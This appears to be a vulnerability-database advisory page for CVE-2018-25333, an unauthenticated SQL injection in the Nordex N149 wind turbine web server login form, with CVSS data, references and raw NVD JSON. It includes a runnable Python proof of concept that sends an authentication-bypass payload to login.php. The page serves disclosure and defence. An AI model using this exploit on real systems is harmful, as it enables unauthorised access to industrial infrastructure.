CVE-2018-25333

Description

Nordex N149/4.0-4.5 Wind Turbine Web Server 4.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the login parameter in login.php. Attackers can submit crafted POST requests with SQL injection payloads in the login field to extract sensitive database information and bypass authentication mechanisms.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Nordex N149/4.0-4.5 Wind Turbine Web Server 4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable Nordex Web Server
target_url = "http://<target-ip>/login.php"

# Injection payload for the login parameter
# This payload attempts to bypass authentication using a tautology
sql_payload = "admin' OR '1'='1' --"

# Data payload for the POST request
post_data = {
    "login": sql_payload,
    "password": "intruder"
}

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) VulnerabilityScanner/1.0",
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    print(f"[*] Sending payload to {target_url}...")
    response = requests.post(target_url, data=post_data, headers=headers, timeout=10)
    
    # Check if the response indicates a successful login or error revealing SQL structure
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response length:", len(response.text))
        # Analyze response content to verify exploitation (e.g., looking for 'Welcome' or dashboard)
        if "dashboard" in response.text.lower() or "welcome" in response.text.lower():
            print("[!] Potential authentication bypass detected!")
        else:
            print("[-] Exploit verification inconclusive based on response content.")
    else:
        print(f"[-] Server returned status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25333
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25333
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25333/
[4] VulDB https://vuldb.com/cve/CVE-2018-25333
[5] http://www.nordex-online.com
[6] https://www.exploit-db.com/exploits/44684
[7] https://www.vulncheck.com/advisories/nordex-n149-wind-turbine-web-server-sql-injection

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25333", "sourceIdentifier": "[email protected]", "published": "2026-05-17T13:16:44.970", "lastModified": "2026-05-18T20:16:05.873", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nordex N149/4.0-4.5 Wind Turbine Web Server 4.0 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the login parameter in login.php. Attackers can submit crafted POST requests with SQL injection payloads in the login field to extract sensitive database information and bypass authentication mechanisms."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "http://www.nordex-online.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/44684", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/nordex-n149-wind-turbine-web-server-sql-injection", "source": "[email protected]"}]}}